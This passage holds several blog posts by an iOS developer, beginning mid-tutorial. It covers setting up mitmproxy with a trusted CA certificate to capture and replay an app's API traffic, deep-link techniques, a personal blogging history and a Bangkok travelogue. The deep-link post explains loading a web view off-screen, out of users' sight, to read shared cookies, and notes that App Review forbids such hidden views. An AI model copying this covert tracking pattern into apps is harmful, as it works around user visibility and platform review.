This means the connection is successful. Find the iOS section and click “Get mitmproxy-ca-cert.pem”.
After the download is complete, go to the phone’s settings, and you will see “Profile Downloaded”. Click to enter.
Go back to Settings -> “General” -> “About” -> At the bottom “Certificate Trust Settings” -> Enable “mitmproxy”.
At this point, we have completed all the preliminary work for the man-in-the-middle attack.
Remember that all the traffic on your phone will go through the proxy from your Mac computer. After the operation is completed, remember to go back to the network settings on your phone and turn off the proxy server settings, otherwise the phone’s WiFi will not be able to connect to the external network.
Go back to Terminal mitmproxy, and while operating the App on your phone, you can see all the captured API request records.
Each request can be entered to view detailed Request & Response content:
The above is the basic setup and actual work of mitmproxy.
3. Sniff and Understand the API Structure
Next, we will use mitmproxy’s mitmdump
service combined with the mitmproxy-rodo addons I developed earlier to record and replay requests.
My implementation principle is to calculate the Hash value of the Request parameters. When replaying, the request is taken to calculate the Hash again. If the same Hash value backup Response is found locally, it will be returned. If there are multiple requests with the same Hash value, they will be stored and replayed in order.
We can first use the above method to sniff the App’s API (or use Proxyman), observe which fields might affect Hash Mapping, and record them for later exclusion settings. For example, some APIs always carry the ?ts
parameter, which does not affect the returned content but affects the Hash value calculation, making it impossible to find the local backup. We need to pick it out and exclude it in the later settings.
4. Set up mitmproxy-rodo:
Use the open-source recording and replay script I wrote.
For detailed parameter settings, please refer to the instructions of the open-source project.
1
+2
+
git clone git@github.com:ZhgChgLi/mitmproxy-rodo.git
+cd mitmproxy-rodo
+
Fill in the parameters picked out in step 3 into the config.json configuration file:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+
{
+ "ignored": {
+ "*": {
+ "*": {
+ "*": {
+ "iterable": false,
+ "enables": [
+ "query",
+ "formData"
+ ],
+ "rules": {
+ "query": {
+ "parameters": [
+ "ts",
+ "connect_id",
+ "device_id",
+ "device_name",
+ ]
+ },
+ "formData": {
+ "parameters": [
+ "aidck",
+ "device_id",
+ "ver_name",
+ ]
+ }
+ }
+ }
+ }
+ }
+ }
+}
+
The above parameters will be excluded when calculating the Hash value, and specific exclusion rules can be set for individual Endpoint paths.
5. Enable recording, and execute in Terminal:
1
+
mitmdump -s rodo.py --set dumper_folder=zhgchgli --set config_file=config.json --set record=true "~d zhgchg.li"
+
"~d zhgchg.li"
means to capture only the traffic of * .zhgchg.li.dumper_folder
: Name of the output destination directory6. Operate the target App on the phone to execute the desired recording process path
While operating, you will see many captured API Response Data in the output directory, stored according to Domain -> API path -> HTTP method -> Hash value -> Header-X / Content-X (if the same Hash request is made twice, it will be saved in order).
After recording, be sure to try replaying once to test if the data is normal. If the Hash Hit is very low (almost no corresponding Response found during replay), you can repeat the sniffing steps to find the variable that affects the Hash value each time the App is executed and exclude it.
Execute replay:
1
+
mitmdump -s rodo.py --set dumper_folder=zhgchgli --set config_file=config.json
+
dumper_folder
: Name of the output destination directoryAt this point, we can reproduce the last moments before the App reached its final station through the restoration of bones and the final meat, to remember the time when everyone worked together to produce it.
This article commemorates the team of my first job and the time when I transitioned from web backend development to iOS App development, learning while doing, and independently producing a product from scratch in 3-4 months, together with Android, design, PM supervisors, and backend colleagues. Although it is about to reach the end of its life cycle, I will always remember the bittersweet moments and the excitement of seeing it go live and being used for the first time.
“Thank you”
If you have the same regrets, I hope this article can help you, because mitmproxy-rodo was initially developed as a POC concept verification tool. Contributions, bug reports, or PRs to fix bugs are welcome.
For any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Build an app transition flow that adapts to all scenarios without interruption
Starting from iOS ≥ 16, when an app actively reads the clipboard without user-initiated action, a prompt will appear asking for permission. Users need to allow this for the app to access clipboard information.
UIPasteBoard’s privacy change in iOS 16
From graduating and completing military service to now working aimlessly for nearly three years, my growth has plateaued, and I have settled into a comfort zone. Fortunately, a decision to resign sparked a new beginning.
While reading “Designing Your Life” and reorganizing my life plan, I reflected on my work and life. Despite not having exceptional technical skills, sharing on Medium has allowed me to enter a state of “flow” and gain a lot of energy. Recently, a friend asked me about Deep Link issues, so I organized my research findings and replenished my energy in the process!
First, let’s explain the practical application scenarios.
Tracking data for app downloads and openings. We want to know how many people actually download and open the app through a promotional link.
Special event entrances, such as being able to receive rewards by downloading and opening through a specific URL.
iOS ≥ 9
As seen, the iOS Deep Link mechanism itself only determines if the app is installed. If it is, the app opens; if not, it does nothing.
The URL Scheme part is controlled by the system and is generally used for internal app calls and rarely exposed publicly. If the trigger point is in an area you cannot control (e.g., Line link), it cannot be handled.
If the trigger point is on your own webpage, you can use some tricks to handle it. Please refer to this link:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+
<html>
+<head>
+ <title>Redirect...</title>
+ <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
+ <script>
+ var appurl = 'marry://open';
+ var appstore = 'https://apps.apple.com/tw/app/%E7%B5%90%E5%A9%9A%E5%90%A7-%E6%9C%80%E5%A4%A7%E5%A9%9A%E7%A6%AE%E7%B1%8C%E5%82%99app/id1356057329';
+
+ var timeout;
+ function start() {
+ window.location = appurl;
+ timeout = setTimeout(function(){
+ if(confirm('Install Marry App now?')){
+ document.location = appstore;
+ }
+ }, 1000);
+ }
+
+ window.onload = function() {
+ start()
+ }
+ </script>
+</head>
+<body>
+
+</body>
+</html>
+
The general logic is to call the URL Scheme, set a Timeout, and if the page has not redirected within the set time, assume that the Scheme cannot be called and redirect to the APP Store page (but the experience is still not good as there will still be a URL error prompt, just with added automatic redirection).
Universal Link itself is a webpage. If there is no redirection, it defaults to being presented in a web browser. Websites with web services can choose to directly jump to the web browser for those services, or directly redirect to the APP Store page.
Websites with web services can add the following code within <head></head>
:
1
+
<meta name="apple-itunes-app" content="app-id=APPID, app-argument=page parameter">
+
When browsing the webpage version on iPhone Safari, an APP installation prompt will appear at the top, along with a button to open the page using the APP; the app-argument
parameter is used to pass in page values and transmit them to the APP.
Flowchart of adding “redirect to APP Store if not available”
Of course, what we want is not just “open the APP when the user has it installed,” but also to link the referral information with the APP, so that the APP automatically displays the target page when opened.
The URL Scheme method can be handled in the AppDelegate’s func application(_ application: UIApplication, open url: URL, sourceApplication: String?, annotation: Any) -> Bool
:
1
+2
+3
+4
+5
+6
+7
+8
+9
+
func application(_ application: UIApplication, open url: URL, sourceApplication: String?, annotation: Any) -> Bool {
+ if url.scheme == "marry",let params = url.queryParameters {
+ if params["type"] == "topic" {
+ let VC = TopicViewController(topicID:params["id"])
+ UIApplication.shared.keyWindow?.rootViewController?.present(VC,animated: true)
+ }
+ }
+ return true
+}
+
The Universal Link method is handled in the AppDelegate’s func application(_ application: UIApplication, continue userActivity: NSUserActivity, restorationHandler: @escaping ([Any]?) -> Void) -> Bool
:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+
extension URL {
+ /// test=1&a=b&c=d => ["test":"1","a":"b","c":"d"]
+ /// Parse the URL query into a [String: String] array
+ public var queryParameters: [String: String]? {
+ guard let components = URLComponents(url: self, resolvingAgainstBaseURL: true), let queryItems = components.queryItems else {
+ return nil
+ }
+
+ var parameters = [String: String]()
+ for item in queryItems {
+ parameters[item.name] = item.value
+ }
+
+ return parameters
+ }
+
+}
+
First, an extension method queryParameters for URL is provided to easily convert URL Queries into a Swift Dictionary.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+
func application(_ application: UIApplication, continue userActivity: NSUserActivity, restorationHandler: @escaping ([Any]?) -> Void) -> Bool {
+
+ if userActivity.activityType == NSUserActivityTypeBrowsingWeb, webpageURL = userActivity.webpageURL {
+ /// If it is a universal link URL source...
+ let params = webpageURL.queryParameters
+
+ if params["type"] == "topic" {
+ let VC = TopicViewController(topicID:params["id"])
+ UIApplication.shared.keyWindow?.rootViewController?.present(VC,animated: true)
+ }
+ }
+
+ return true
+}
+
Done!
It looks perfect now, we’ve handled all the scenarios we might encounter, so what else is missing?
What is a Deferred Deep Link? It is to extend our Deep Link to retain referral data even after installing from the APP Store.
According to Android engineers, Android itself has this feature, but it is not supported on iOS, and the method to achieve this is not user-friendly. Keep reading to find out more.
If you don’t want to spend time doing it yourself, you can directly use branch.io or Firebase Dynamic Links. The method introduced in this article is the way Firebase uses.
There are two ways to achieve the effect of Deferred Deep Link:
One is to calculate a hash value based on user device, IP, environment, etc., store data on the server on the web side; when the APP is opened after installation, calculate in the same way, if the values are the same, retrieve the data (branch.io’s method).
The other is the method introduced in this article, similar to Firebase’s approach; using the iPhone clipboard and Safari and APP Cookie sharing mechanism, which means storing data in the clipboard or Cookie, and then reading it out for use after the APP is installed.
After clicking “Open,” your clipboard will be automatically overwritten with JavaScript to copy and redirect to relevant information: https://XXX.app.goo.gl/?link=https://XXX.net/topicID=1&type=topic
Those who have used Firebase Dynamic Links must be familiar with this opening redirect page. Once you understand the principle, you will know that this page cannot be removed from the process!
Additionally, Firebase does not provide style modifications.
First, let’s talk about the support issue; as mentioned earlier, it is “not user-friendly”!
If the APP only considers iOS ≥ 10, it is much easier. The APP implements clipboard access, the Web uses JavaScript to overwrite information to the clipboard, and then redirects to the APP Store for download.
iOS = 9 does not support JavaScript automatic clipboard but supports Safari and APP SFSafariViewController “Cookie sharing method”
Also, the APP needs to secretly add SFSafariViewController in the background to load the Web, and then obtain the Cookie information stored when clicking the link from the Web.
The process is cumbersome & link clicks are limited to Safari browser.
According to the official documentation, iOS 11 can no longer access the user’s Safari Cookie. If you have such a requirement, you can use SFAuthenticationSession, but this method cannot be executed stealthily in the background, and a confirmation window will pop up each time before loading.
SFAuthenticationSession Prompt
Also, App Review does not allow placing SFSafariViewController where users cannot see it. (It’s not easy to be noticed by triggering programmatically and then adding it as a subview.)
Let’s start with something simple, considering users with iOS ≥ 10, simply transfer information using the iPhone clipboard.
We customized our own page similar to Firebase Dynamic Links, using the clipboard.js
package to copy the information we want to bring to the app when users click “Go Now” to the clipboard (marry://topicID=1&type=topic)
, and then use location.href
to redirect to the App Store page.
Read the clipboard value in AppDelegate or the main UIViewController:
let pasteData = UIPasteboard.general.string
It is recommended to wrap the information using the URL Scheme method here for easy identification and data decryption:
1
+2
+3
+4
+5
+6
+
if let pasteData = UIPasteboard.general.string, let url = URL(string: pasteData), url.scheme == "marry", let params = url.queryParameters {
+ if params["type"] == "topic" {
+ let VC = TopicViewController(topicID: params["id"])
+ UIApplication.shared.keyWindow?.rootViewController?.present(VC, animated: true)
+ }
+}
+
Finally, after completing the action, use UIPasteboard.general.string = “”
to clear the information in the clipboard.
Here comes the tricky part, supporting the iOS 9 version. As mentioned earlier, due to the lack of clipboard support, we need to use the Cookie Exchange Method.
Handling the web end is relatively straightforward, just change it so that when the user clicks “Go Now,” the information we want to bring to the app is stored in a Cookie (marry://topicID=1&type=topic)
, and then use location.href
to redirect to the App Store page.
Here are two pre-packaged JavaScript methods for handling Cookies to speed up development:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+
/// name: Cookie name
+/// val: Cookie value
+/// day: Cookie expiration period, default is 1 day
+/// EX1: setcookie("iosDeepLinkData","marry://topicID=1&type=topic")
+/// EX2: setcookie("hey","hi",365) = valid for one year
+function setcookie(name, val, day) {
+ var exdate = new Date();
+ day = day || 1;
+ exdate.setDate(exdate.getDate() + day);
+ document.cookie = "" + name + "=" + val + ";expires=" + exdate.toGMTString();
+}
+
+/// getCookie("iosDeepLinkData") => marry://topicID=1&type=topic
+function getCookie(name) {
+ var arr = document.cookie.match(new RegExp("(^| )" + name + "=([^;]*)(;|$)"));
+ if (arr != null) return decodeURI(arr[2]);
+ return null;
+}
+
Here comes the most troublesome part of this document.
As mentioned earlier, we need to secretly load an SFSafariViewController in the background in the main UIViewController to implement the principle.
Another pitfall: The issue of secretly loading is that if the size of the View of iOS ≥ 10 SFSafariViewController is set to less than 1, the opacity is less than 0.05, and it is set to isHidden, the SFSafariViewController will not load.
p.s iOS = 10 supports both Cookies and Clipboard simultaneously.
My approach here is to place a UIView above the UIViewController of the main page with any height, align it to the bottom of the main UIView, then drag IBOutlet (sharedCookieView)
to the Class; in viewDidLoad()
, initialize the SFSafariViewController and add its View to sharedCookieView
, so it actually displays and loads, just off-screen where the user can’t see 🌝.
Where should the URL of SFSafariViewController point to?
Similar to sharing a page on the web, we need to create a separate page for reading Cookies, and place both pages under the same domain to avoid cross-domain Cookie issues, the page content will be provided later.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+
@IBOutlet weak var SharedCookieView: UIView!
+
+override func viewDidLoad() {
+ super.viewDidLoad()
+
+ let url = URL(string:"http://app.marry.com.tw/loadCookie.html")
+ let sharedCookieViewController = SFSafariViewController(url: url)
+ VC.view.frame = CGRect(x: 0, y: 0, width: 200, height: 200)
+ sharedCookieViewController.delegate = self
+
+ self.addChildViewController(sharedCookieViewController)
+ self.SharedCookieView.addSubview(sharedCookieViewController.view)
+
+ sharedCookieViewController.beginAppearanceTransition(true, animated: false)
+ sharedCookieViewController.didMove(toParentViewController: self)
+ sharedCookieViewController.endAppearanceTransition()
+}
+
sharedCookieViewController.delegate = self
class HomeViewController: UIViewController, SFSafariViewControllerDelegate
This Delegate needs to be added to capture the callback after loading is complete.
We can use:
func safariViewController(_ controller: SFSafariViewController, didCompleteInitialLoad didLoadSuccessfully: Bool) {
Capture the load completion event in the method.
At this point, you might think that reading the cookies in didCompleteInitialLoad
completes the process!
I couldn’t find a method to read SFSafariViewController cookies here, and using internet methods to read them always returns empty.
Or you may need to interact with the page content using JavaScript, have JavaScript read the cookies and return them to the UIViewController.
Since iOS doesn’t know how to get shared cookies, we can directly let the “cookie-reading page” help us “read the cookies”.
The JavaScript method for handling cookies provided earlier with the getCookie() function is used here. Our “cookie-reading page” is a blank page (users can’t see it anyway), but in the JavaScript part, we need to read the cookies after the body onload event:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+
<html>
+<head>
+ <title>Load iOS Deep Link Saved Cookie...</title>
+ <script>
+ function checkCookie() {
+ var iOSDeepLinkData = getCookie("iOSDeepLinkData");
+ if (iOSDeepLinkData && iOSDeepLinkData != '') {
+ setcookie("iOSDeepLinkData", "", -1);
+ window.location.href = iOSDeepLinkData; /// marry://topicID=1&type=topic
+ }
+ }
+ </script>
+</head>
+
+<body onload="checkCookie();">
+
+</body>
+
+</html>
+
The actual principle is summarized as follows: add an SFSafariViewController
to HomeViewController viewDidLoad
to secretly load the loadCookie.html
page. The loadCookie.html
page checks and reads the previously stored cookies, clears them if found, and then uses window.location.href
to trigger the URL Scheme
mechanism.
So the corresponding callback processing will return to func application(_ application: UIApplication, open url: URL, sourceApplication: String?, annotation: Any)
in AppDelegate
.
If you find it cumbersome, you can directly use branch.io or Firebase Dynamic without reinventing the wheel. Here, it’s because of interface customization and some complex requirements that we have to build it ourselves.
iOS 9 users are already very rare, so you can ignore it if it’s not necessary; using the clipboard method is fast and efficient, and using the clipboard means you don’t have to limit the links to be opened in Safari!
If you have any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
It has been over 4 years since I last managed a blog. The remaining ad revenue of US$88 has been stuck there. Recently, I discovered that I could request to cancel my Adsense account, and as long as I reach the minimum payout threshold, Google will give me the final payment. This has given me the motivation to start writing a blog again.
Starting fresh, I chose the simple title “The Beginning is Always the Hardest” as a starting point.
Reflecting on my history of blogging, it started around middle school when I was most obsessed with games. The family computer was very old and couldn’t run many games, but at that playful age, even if there were no games to play, I still had to turn on the computer every day. It was already very novel to me at that time.
Due to the above factors, most of my computer time was spent chatting with classmates on instant messaging and browsing web pages. As you can imagine, it was quite empty and lacked a sense of accomplishment (at least others could gain a sense of accomplishment from playing games).
At that time, “blogs” were very popular and very new to me. The first one I encountered was the once-popular Wretch.cc. When I created an account and opened my blog for the first time, I felt, “Wow! I have my own website,” and “Wow! I can change the style, so cool.” Coincidentally, the school’s computer class taught web design (Front-Page 2003/ Sheng’s Website), so my first blog was all about exploring the features, finding materials, playing with styles, and installing many “cool” JavaScript plugins. In contrast, the content quality was basically junk.
This gave me a deeper understanding of the online world, such as how to find information, how to fix broken plugins, how to embed images, etc.
Many of the resources were obtained from forums, which were also very popular at the time. However, I was a typical lurker who only read and rarely posted, occasionally replying with “Thanks for the generous share.” While browsing various forums, I discovered “free forums,” where you could become an admin and have your own forum just by signing up. This was a level higher than blogs, and being an “admin” was super cool!
Combining the basics of playing with blog settings, forums had even more settings to play with (creating boards, member permissions, plugin centers). Everything could be set by yourself, like entering another world.
There were many free forum systems, and I kept switching and trying them out. Some had incomplete features, some were not free, some were unstable, and some had too many ads. The one I remember most was Marlito, which best met my needs and was the one I managed the longest.
At the same time, I moved my blog to “YouthWant Blog.” The reason was that Wretch.cc started imposing various restrictions, and YouthWant was just starting, with fewer restrictions and features that met my needs. This time, I focused on content, with 70% sharing useful software (similar to A-Rong’s Welfare) and 30% sharing forum experiences (settings/bug fixes).
I wrote about 30 posts, with daily views around 200 and a peak of 500 (not much by today’s standards). I was in the top 10 of YouthWant’s blog rankings, with most traffic coming from posts sharing useful software. I managed it seriously for over a year, but then got busy with schoolwork in the third year of middle school and high school. Eventually, I joined a training program and left the blog idle.
Due to the blog name being too cheesy, only a screenshot of the view count is shown.
Later, I created another Blogger for technical articles, recording programming issues and solutions. However, Blogger was not user-friendly, and its basic features couldn’t meet my needs, so I gave up after a few posts.
In the later stages, I applied for a domain and bought hosting to set up a WordPress blog. But everything had to be done by myself—setting up, adjusting features. I couldn’t focus on writing content, so it was also written intermittently. After the hosting expired, I didn’t renew it, and the website went offline until now.
In summary, the journey from finding the concept of a Blog very novel -> to -> exploring and mastering Blog functionalities -> to -> focusing on the essence of the Blog - the content of the articles -> to -> sharing technical articles
Laziness, less recording of the process, reviewing, and sharing, and the allure of advertising revenue gradually led me further away from my original intention, the simple enthusiasm to share with everyone.
https://www.flickr.com/photos/zuvonne/3738631215
This article is also published on my personal Blog: [Click here to visit].
For any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Returning to Thailand after the pandemic, a quick 5-day free and easy trip to Bangkok.
Going back to 2018, it was the first company trip of my first job after entering the workforce, and also my first time traveling abroad, to Bangkok + Hua Hin (5 days); the following year in 2019, I went to Sabah with colleagues on another company trip; then the pandemic stole two years from us, and after it ended, I started going on crazy free and easy trips to Japan.
Back then, I was a newbie, with zero social experience, blindly following my older colleagues. I didn’t even know what I could or couldn’t bring on the plane. During security check, I absentmindedly placed my passport on the basket, and almost lost it when it fell off the conveyor belt (if it had fallen into a gap, I wouldn’t have been able to retrieve it); that time, it was a mindless guided tour, mindlessly riding tour buses. My impression of Bangkok wasn’t very clear, I only remember that the rooftop bar was great, the weather was hot, things were cheap, and massages were affordable. I had no concept of the geographical locations.
So, I always wanted to revisit Bangkok to relive the memories from six years ago. However, not being familiar with Southeast Asia, I was a bit hesitant to travel alone. Coincidentally, at the beginning of the year, while bantering with Pinkoi colleagues, we ended up planning this 5-day free and easy trip to Bangkok.
Details and fragments of memories from the 2018 Bangkok + Hua Hin 5-day trip are included in the appendix at the end of this document.
[**Thailand SIM Card | AIS 5G High-Speed Internet 8 Days Unlimited Data + Calls eSIM**](https://www.kkday.com/zh-tw/product/137037-ais-16-day-unlimited-data-esim-activate-before-may-3-2023-thailand?cid=19365){:target=”_blank”} |
Because I started a new job in June, I didn’t have much time for leisure activities. Mark and Sean were mainly responsible for arranging and planning, so I didn’t do much homework.
⚠️⚠️⚠️I have placed the safety and precautions for traveling to Bangkok, Thailand after the travelogue. You may skip the travelogue but it is essential to understand the precautions against scams and things to be aware of, especially if you encounter marijuana.
Due to the rushed preparation this time, I hadn’t arranged for internet access the day before and didn’t have time to buy a physical SIM card. Fortunately, I tried eSIM for the first time and loved it after using it.
I directly purchased the [**Thailand SIM Card | AIS 5G High-Speed Internet 8 Days Unlimited Data + Calls eSIM**](https://www.kkday.com/zh-tw/product/137037-ais-16-day-unlimited-data-esim-activate-before-may-3-2023-thailand?cid=19365){:target=”_blank”} from KKday. After purchasing, I received the eSIM activation certificate and could start using it. |
 |
Thailand SIM Card | AIS 5G High-Speed Internet 8 Days Unlimited Data + Calls eSIM
Mainly for unlimited data usage, cheaper than physical SIM cards, 8 days for NT $232.
Airline: Thai VietJet Air
Price: TWD $9,259
(including additional round-trip 15 kg checked baggage)
Initially, I wanted to travel with my friends, but they didn’t check in any baggage (ticket price was around $6,000
), and later when I checked other airlines, I felt like I was losing out; the regular airlines were around $10,000
during similar periods, not much of a difference, but much more comfortable!
In fact, Thai VietJet Air allows baggage to be carried without checking in. Passengers can bring two pieces of carry-on baggage with a total weight not exceeding 7 kilograms.
1
+2
+3
+4
+5
+6
+7
+8
+9
+
1. Carry-on baggage weight:
+Each passenger (except infants) can bring 1 piece of their own baggage and 1 small carry-on baggage, with a maximum total weight not exceeding 07 kg.
+
+2. Carry-on baggage dimensions:
+- 01 piece with maximum dimensions of 56cm x 36cm x 23cm for carry-on baggage
+- 01 small carry-on baggage (including the following items)
+ + 01 bag for girls, magazines, cameras, bags for baby food, bags purchased at the airport with dimensions not exceeding 30cm x 20cm x 10cm, etc.
+ + 01 coat with dimensions not exceeding 114cm x 60cm x 11cm when opened.
+ + 01 notebook with maximum dimensions of 40cm x 30cm x 10cm
+
Information as of 2024/08/22, subject to the latest official announcements.
Basically, carrying a backpack and dragging a carry-on suitcase is enough.
Received a flight change notice around 11 pm on 8/1, with the schedule changed to depart at 16:35 and arrive at 19:20.
JC KEVIN SATHORN BANGKOK HOTEL
36 Narathiwas-Ratchanakarin Road, Yannawa, Sathorn, Bangkok, Thailand, 10120
A friend exchanged 3,000 THB in advance, while I exchanged at SuperRich upon arrival.
Register and link a credit card to Grab in Taiwan for convenient use.
Prepared Taiwanese souvenirs for Agoda’s top performer.
Left home around 12:30 pm after work.
Remember to take the Airport MRT Express train, even if you take the regular train in the morning, it won’t arrive earlier than the Express train!
Arrived at Taoyuan Airport Terminal 1 around 1:30 pm.
The check-in counter was completely empty, so I checked in and completed the baggage drop directly upon arrival.
Once again, it’s B1R, the furthest gate that requires taking a shuttle.
It was still early before 4:00 PM, so I decided to have another meal at the airport. This time, I found out that I could order individual items at the restaurant, not just fried chicken as before!
I discovered that walking further ahead from the restaurant leads directly to the second terminal. So, if you have plenty of time, you can walk to the second terminal for food or come back to the first terminal to relax at the free VIP lounge.
After buying food, I went to the free VIP lounge at the first terminal to rest and eat. This time, I saw people charging their devices. Last time I was here, all the power outlets were taken, but it seems they have fixed it now.
The flight information wasn’t updated, showing 4:00 PM, but the actual departure time was changed to 4:35 PM.
Due to flight delays, the actual departure time was 5:13 PM.
I heard from colleagues that during peak hours at Bangkok Airport, you can purchase the Thailand Airport BKK Departure Meet and Greet Fast Track Service for quick clearance. However, when we arrived, there were hardly any passengers, so the clearance was quick.
Possibly due to the budget airline, there were not many checked bags, so the luggage retrieval was very fast.
Upon exiting the airport, I started to figure out how to set up and activate the eSIM, only to realize…
⚠️Activating eSIM requires an internet connection⚠️
It’s like buying a pair of scissors but needing another pair of scissors to open it. Activating the eSIM requires an initial internet connection for activation. Luckily, a friend traveling with me had already activated their eSIM in Taiwan, so I borrowed their internet to activate mine. (There is also Wi-Fi available at the airport, so no need to worry too much.)
I found the eSIM activation page and simply long-pressed the QR code to select “Add to eSIM.”
For some reason, if you save the QR code to photos or notes, you won’t have the quick add function. Another method is to send the QR code to a companion or print it out for scanning with your phone.
iPhone iOS eSIM manual setup path: Settings -> Mobile Network -> Add eSIM -> Scan QRCode -> Enter information manually -> Enter information in the message -> Use for. You can choose “Travel” -> Select “Travel” for mobile data usage -> Done!
After activation, it is equivalent to dual standby, but if the original number SIM card does not have a roaming plan, there will be no network before. In case of emergency, you can switch back to the original SIM card number!
Because it takes over an hour to get to the city and hotel, the budget airline does not provide meals. Everyone is hungry, so they decided to have dinner at the airport first.
They found a Thai restaurant to eat at, the shredded pork was spicy and refreshing, and the vegetable soup helped to ease the spiciness.
👉👉👉You can refer to KKday airport transfer service:
_[- Thailand Airport Private Transfer Suvarnabhumi Airport (BKK) / Don Mueang Airport (DMK) - Bangkok/Pattaya/Hua Hin City Hotels](https://www.kkday.com/zh-tw/product/3431-bkk-or-dmk-bangkok-private-transfer?cid=19365){:target=”blank”}
_[- Bangkok Airport Transfer Bangkok City Private Car to Suvarnabhumi Airport (BKK)/Don Mueang Airport (DMK)](https://www.kkday.com/zh-tw/product/138989?cid=19365){:target=”blank”}
Around 21:00, they started moving to the city and hotel.
Taking public transportation requires three transfers on the subway and BTS:
Suvarnabhumi
-> Phaya Thai
Phaya Thai
-> Siam
Siam
-> Chong Nonsi
Chong Nonsi
(later found out that this is the station for Mahanakhon Building!)When getting off the BTS, don’t rush to the overpass, you can cross the road from the overpass.
I felt it was very dark along the way (not many street lights), and it was quite far to walk (15 mins / 1 KM). It can be quite scary to walk alone at night. Along the way, there is a 7-11 and a small night market. I bought some food at 7-11 to take back to the hotel.
In addition, if you take a taxi, due to the two-way road and U-turn issue, the driver needs to drive a short distance past the hotel to the next gap before making a U-turn back to the hotel, so it’s a bit troublesome.
Arrived at the hotel around 10:30.
The room is very spacious, it’s a whole apartment-style room with a master bedroom, a guest bedroom, two bathrooms, a kitchen, a living room, and a balcony.
Taken in 2018 / iPhone 6
It’s a coincidence that during the 2018 company trip to Bangkok, we all took a taxi to the rooftop bar at this hotel in the evening XD
They also offer a Sky Bar dinner package:
2024 / iPhone 15 Pro
Since we were staying here this time, after putting down our luggage in the room, we went up to take a look.
As it was already past dinner time, we could only order some appetizers and skewers.
Had breakfast at the hotel in the morning before heading out. The breakfast was okay, but not many choices.
Due to the large number of people, we took a Grab (THB 135) directly to Wat Pho.
Photo by Florian Wehde
We passed through Chinatown on the way, forgot to take photos, it had a very cyberpunk feel!
👉👉👉 You can also consider KKday’s: Bangkok Private Day Tour: Wat Pho, Wat Arun, Grand Palace, Wat Phra Kaew Thailand
Ticket: THB 300/person.
The colorful stupas in Wat Pho have an indescribable grandeur.
Last time I went to see the reclining Buddha at Nanzoin in Kyushu, Japan, this time I came to see the reclining Buddha in Thailand.
⚠️Be cautious of pickpockets in crowded areas⚠️
You need to wear slippers to enter, and you can walk around the reclining Buddha in Wat Pho to pay your respects.
After leaving Wat Pho, we wanted to exchange some money. Only one friend had exchanged some Thai baht in advance, while the rest of us planned to exchange it in Bangkok. So, we first went to the nearby The Old Siam Shopping Plaza to exchange money at SuperRich.
Exchanged NTD $5,000 for THB $5,200
Khanom bueang Thai crispy pancakes
After exchanging money, we had some cash, so we replenished our energy at the food market on the first floor. We tried Thai crispy pancakes (ขนมเบื้อง), which were sweet with meringue inside, very similar to cotton candy, and also had banana pancakes. Finally, we bought a cup of iced coffee and continued our journey.
Ticket: THB 500/person.
👉👉👉KKday offers: Grand Palace and Wat Phra Kaew Guided Tour (English, Thai, Chinese, Japanese) , for those who want to learn more about history.
Walking back to the Grand Palace (Wat Phra Kaew is inside the Grand Palace), you will see many government buildings along the way.
There is a dress code to enter the Grand Palace, so pay special attention!
No shorts, sleeveless shirts, ripped jeans, capri pants, short skirts, etc.
⚠️Be cautious of pickpockets in crowded areas⚠️
Yaksha guardian at the gate
Yaksha and monkeys
Wat Arun
Ramakien Mural
Image Source: Trueplookpanya
⚠️No Photography Allowed at the Jade Buddha⚠️
The attire varies with each season, and this time we saw the second type of clothing.
Grand Palace
Around 13:00, after leaving the Grand Palace, we had lunch at a nearby western restaurant heading towards the pier.
⚠️Outside the pier, there will be people trying to lure you onto private boats, charging high fees (THB 500, 1000) and not being safe; ignore them and find the official pier and counter to inform them of your destination.
The official fare is only THB 30 (from Tha Chang to Wat Arun), the new boats are air-conditioned, safe, and comfortable.
When the boat arrives, the staff will announce “Wat Arun” (yes, in Chinese), and you can always ask if unsure.
It’s almost time for afternoon thunderstorms, and you can see the water flowing turbulently.
The boat is new, the air conditioning is cool, the enclosed space is safe, and there are frequent trips, making it very convenient!
Upon arrival, the staff will also announce “Wat Arun.”
Entrance Fee: THB 200
After disembarking, you will reach Wat Arun, where you can directly queue to purchase tickets for entry.
⚠️There is a dress code at Wat Arun⚠️
No sleeveless tops, shorts, exposed midriffs, or short skirts allowed.
You can wear Thai traditional clothing; many people wear Thai attire for photos.
You can walk to the central platform for photos (⚠️Be careful, the stairs are steep), and many people also change into Thai attire for photos here.
👉👉👉 Recommended KKday Experiences:
- Thai Costume Experience with Photo Tour at Wat Arun in Bangkok, Thailand
After visiting, return to the pier and find the ticket booth (PIER 2) to buy a boat ticket to ICONSIAM (THB 40), then board at PIER 1.
Also a comfortable and safe new boat!
ICONSIAM is large and luxurious, the food street on the first floor is very distinctive.
Buy a cup of ChaTraMue Thai milk tea to recharge.
Continue walking to BTS Charoen Nakhon platform, thinking of getting a foot massage for an hour.
There is a newer and larger Thai Garden Massage outside the station (1), but no available seats; fortunately, continue walking to (2) another one as shown in the picture, which I find very comfortable, less crowded, spacious, quiet, and inexpensive (foot/1 hour/THB 270).
After the massage, with renewed energy, continue shopping and return to ICONSIAM; walk upstairs to the restaurant, which is also elaborately decorated with a jungle theme, small bridges, flowing water, and a waterfall, overall very nice!
Bought the famous Japanese TORO FRIES (long queue) to recharge.
They also have Japanese % coffee here.
This is a branch line with only three stations and fewer trains.
Google Maps seems to have no information on this BTS line; it suggests walking to Krung Thon Buri.
Take one stop from here to Krung Thon Buri, which is the Silom Line.
There is also LAWSON in Bangkok!
